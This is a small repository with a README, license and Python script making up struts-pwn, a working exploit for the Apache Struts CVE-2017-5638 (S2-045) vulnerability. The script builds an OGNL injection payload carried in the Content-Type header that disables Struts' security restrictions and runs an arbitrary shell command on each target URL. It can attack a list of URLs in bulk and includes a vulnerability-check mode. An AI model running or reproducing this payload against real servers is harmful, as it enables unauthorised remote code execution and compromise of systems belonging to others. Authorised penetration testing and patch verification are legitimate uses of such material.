├── requirements.txt
├── LICENSE.txt
├── README.md
└── struts-pwn.py


/requirements.txt:
--------------------------------------------------------------------------------
1 | argparse
2 | requests
3 | 


--------------------------------------------------------------------------------
/LICENSE.txt:
--------------------------------------------------------------------------------
 1 | The MIT License (MIT)
 2 | 
 3 | Copyright (c) 2017 Mazin Ahmed
 4 | 
 5 | Permission is hereby granted, free of charge, to any person obtaining a copy
 6 | of this software and associated documentation files (the "Software"), to deal
 7 | in the Software without restriction, including without limitation the rights
 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
 9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 | 
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 | 
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
22 | 
23 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | *struts-pwn*
 2 | ============
 3 | 
 4 | ### An exploit for Apache Struts CVE-2017-5638 ###
 5 | 
 6 | 
 7 | # **Usage** #
 8 | 
 9 | ## Testing a single URL. ##
10 | `python struts-pwn.py --url 'http://example.com/struts2-showcase/index.action' -c 'id'`
11 | 
12 | ## Testing a list of URLs. ##
13 | `python struts-pwn.py --list 'urls.txt' -c 'id'`
14 | 
15 | ## Checking if the vulnerability exists against a single URL. ##
16 | `python struts-pwn.py --check --url 'http://example.com/struts2-showcase/index.action'`
17 | 
18 | ## Checking if the vulnerability exists against a list of URLs. ##
19 | `python struts-pwn.py --check --list 'urls.txt'`
20 | 
21 | 
22 | # **Requirements** #
23 | * Python2 or Python3
24 | * requests
25 | 
26 | 
27 | # **Legal Disclaimer** #
28 | This project is made for educational and ethical testing purposes only. Usage of struts-pwn for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program.
29 | 
30 | 
31 | # **License** #
32 | The project is licensed under MIT License.
33 | 
34 | 
35 | # **Author** #
36 | *Mazin Ahmed*
37 | * Website: [https://mazinahmed.net](https://mazinahmed.net)
38 | * Email: *mazin AT mazinahmed DOT net*
39 | * Twitter: [https://twitter.com/mazen160](https://twitter.com/mazen160)
40 | * Linkedin: [http://linkedin.com/in/infosecmazinahmed](http://linkedin.com/in/infosecmazinahmed)
41 | 


--------------------------------------------------------------------------------
/struts-pwn.py:
--------------------------------------------------------------------------------
  1 | #!/usr/bin/env python3
  2 | # coding=utf-8
  3 | # *****************************************************
  4 | # struts-pwn: Apache Struts CVE-2017-5638 Exploit
  5 | # Author:
  6 | # Mazin Ahmed <Mazin AT MazinAhmed DOT net>
  7 | # This code is based on:
  8 | # https://www.exploit-db.com/exploits/41570/
  9 | # https://www.seebug.org/vuldb/ssvid-92746
 10 | # *****************************************************
 11 | import sys
 12 | import random
 13 | import requests
 14 | import argparse
 15 | 
 16 | # Disable SSL warnings
 17 | try:
 18 |     import requests.packages.urllib3
 19 |     requests.packages.urllib3.disable_warnings()
 20 | except:
 21 |     pass
 22 | 
 23 | if len(sys.argv) <= 1:
 24 |     print('[*] CVE: 2017-5638 - Apache Struts2 S2-045')
 25 |     print('[*] Struts-PWN - @mazen160')
 26 |     print('\n%s -h for help.' % (sys.argv[0]))
 27 |     exit(0)
 28 | 
 29 | parser = argparse.ArgumentParser()
 30 | parser.add_argument("-u", "--url",
 31 |                     dest="url",
 32 |                     help="Check a single URL.",
 33 |                     action='store')
 34 | parser.add_argument("-l", "--list",
 35 |                     dest="usedlist",
 36 |                     help="Check a list of URLs.",
 37 |                     action='store')
 38 | parser.add_argument("-c", "--cmd",
 39 |                     dest="cmd",
 40 |                     help="Command to execute. (Default: id)",
 41 |                     action='store',
 42 |                     default='id')
 43 | parser.add_argument("--check",
 44 |                     dest="do_check",
 45 |                     help="Check if a target is vulnerable.",
 46 |                     action='store_true')
 47 | args = parser.parse_args()
 48 | url = args.url if args.url else None
 49 | usedlist = args.usedlist if args.usedlist else None
 50 | url = args.url if args.url else None
 51 | cmd = args.cmd if args.cmd else None
 52 | do_check = args.do_check if args.do_check else None
 53 | 
 54 | 
 55 | def url_prepare(url):
 56 |     url = url.replace('#', '%23')
 57 |     url = url.replace(' ', '%20')
 58 |     if ('://' not in url):
 59 |         url = str('http') + str('://') + str(url)
 60 |     return(url)
 61 | 
 62 | 
 63 | def exploit(url, cmd):
 64 |     url = url_prepare(url)
 65 |     print('\n[*] URL: %s' % (url))
 66 |     print('[*] CMD: %s' % (cmd))
 67 | 
 68 |     payload = "%{(#_='multipart/form-data')."
 69 |     payload += "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)."
 70 |     payload += "(#_memberAccess?"
 71 |     payload += "(#_memberAccess=#dm):"
 72 |     payload += "((#container=#context['com.opensymphony.xwork2.ActionContext.container'])."
 73 |     payload += "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))."
 74 |     payload += "(#ognlUtil.getExcludedPackageNames().clear())."
 75 |     payload += "(#ognlUtil.getExcludedClasses().clear())."
 76 |     payload += "(#context.setMemberAccess(#dm))))."
 77 |     payload += "(#cmd='%s')." % cmd
 78 |     payload += "(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))."
 79 |     payload += "(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))."
 80 |     payload += "(#p=new java.lang.ProcessBuilder(#cmds))."
 81 |     payload += "(#p.redirectErrorStream(true)).(#process=#p.start())."
 82 |     payload += "(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))."
 83 |     payload += "(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))."
 84 |     payload += "(#ros.flush())}"
 85 | 
 86 |     headers = {
 87 |         'User-Agent': 'struts-pwn (https://github.com/mazen160/struts-pwn)',
 88 |         # 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36',
 89 |         'Content-Type': str(payload),
 90 |         'Accept': '*/*'
 91 |     }
 92 | 
 93 |     timeout = 3
 94 |     try:
 95 |         output = requests.get(url, headers=headers, verify=False, timeout=timeout, allow_redirects=False).text
 96 |     
 97 |     except requests.exceptions.ChunkedEncodingError:
 98 |         print("[!] ChunkedEncodingError Error: Making another request to the url.")
 99 |         print("Refer to: https://github.com/mazen160/struts-pwn/issues/8 for help.")
100 |         try:
101 |             output = b""
102 |             with requests.get(url, headers=headers, verify=False, timeout=timeout, allow_redirects=False, stream=True) as resp:
103 |                 for i in resp.iter_content():
104 |                     output += i
105 |         except requests.exceptions.ChunkedEncodingError as e:
106 |             print("EXCEPTION::::--> " + str(e))
107 |             print("Note: Server Connection Closed Prematurely\n")
108 |         except Exception as e:
109 |             print("EXCEPTION::::--> " + str(e))
110 |             output = 'ERROR'
111 |         if type(output) != str:
112 |             output = output.decode('utf-8')
113 |         return(output)
114 |     except Exception as e:
115 |         print("EXCEPTION::::--> " + str(e))
116 |         output = 'ERROR'
117 |     
118 |     return(output)
119 | 
120 | 
121 | def check(url):
122 |     url = url_prepare(url)
123 |     print('\n[*] URL: %s' % (url))
124 | 
125 |     random_string = ''.join(random.choice('abcdefghijklmnopqrstuvwxyz') for i in range(7))
126 | 
127 |     payload = "%{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse']."
128 |     payload += "addHeader('%s','%s')}.multipart/form-data" % (random_string, random_string)
129 |     headers = {
130 |         'User-Agent': 'struts-pwn (https://github.com/mazen160/struts-pwn)',
131 |         # 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36',
132 |         'Content-Type': str(payload),
133 |         'Accept': '*/*'
134 |     }
135 | 
136 |     timeout = 3
137 |     try:
138 |         resp = requests.get(url, headers=headers, verify=False, timeout=timeout, allow_redirects=False)
139 |         if ((random_string in resp.headers.keys()) and (resp.headers[random_string] == random_string)):
140 |             result = True
141 |         else:
142 |             result = False
143 |     except Exception as e:
144 |         print("EXCEPTION::::--> " + str(e))
145 |         result = False
146 |     return(result)
147 | 
148 | 
149 | def main(url=url, usedlist=usedlist, cmd=cmd, do_check=do_check):
150 |     if url:
151 |         if do_check:
152 |             result = check(url)  # Only check for existence of Vulnerablity
153 |             output = '[*] Status: '
154 |             if result is True:
155 |                 output += 'Vulnerable!'
156 |             else:
157 |                 output += 'Not Affected.'
158 |         else:
159 |             output = exploit(url, cmd)  # Exploit
160 |         print(output)
161 | 
162 |     if usedlist:
163 |         URLs_List = []
164 |         try:
165 |             f_file = open(str(usedlist), 'r')
166 |             URLs_List = f_file.read().replace('\r', '').split('\n')
167 |             try:
168 |                 URLs_List.remove('')
169 |             except ValueError:
170 |                 pass
171 |                 f_file.close()
172 |         except:
173 |             print('Error: There was an error in reading list file.')
174 |             exit(1)
175 |         for url in URLs_List:
176 |             if do_check:
177 |                 result = check(url)  # Only check for existence of Vulnerablity
178 |                 output = '[*] Status: '
179 |                 if result is True:
180 |                     output += 'Vulnerable!'
181 |                 else:
182 |                     output += 'Not Affected.'
183 |             else:
184 |                 output = exploit(url, cmd)  # Exploit
185 |             print(output)
186 | 
187 |     print('[%] Done.')
188 | 
189 | if __name__ == '__main__':
190 |     try:
191 |         main(url=url, usedlist=usedlist, cmd=cmd, do_check=do_check)
192 |     except KeyboardInterrupt:
193 |         print('\nKeyboardInterrupt Detected.')
194 |         print('Exiting...')
195 |         exit(0)
196 | 


--------------------------------------------------------------------------------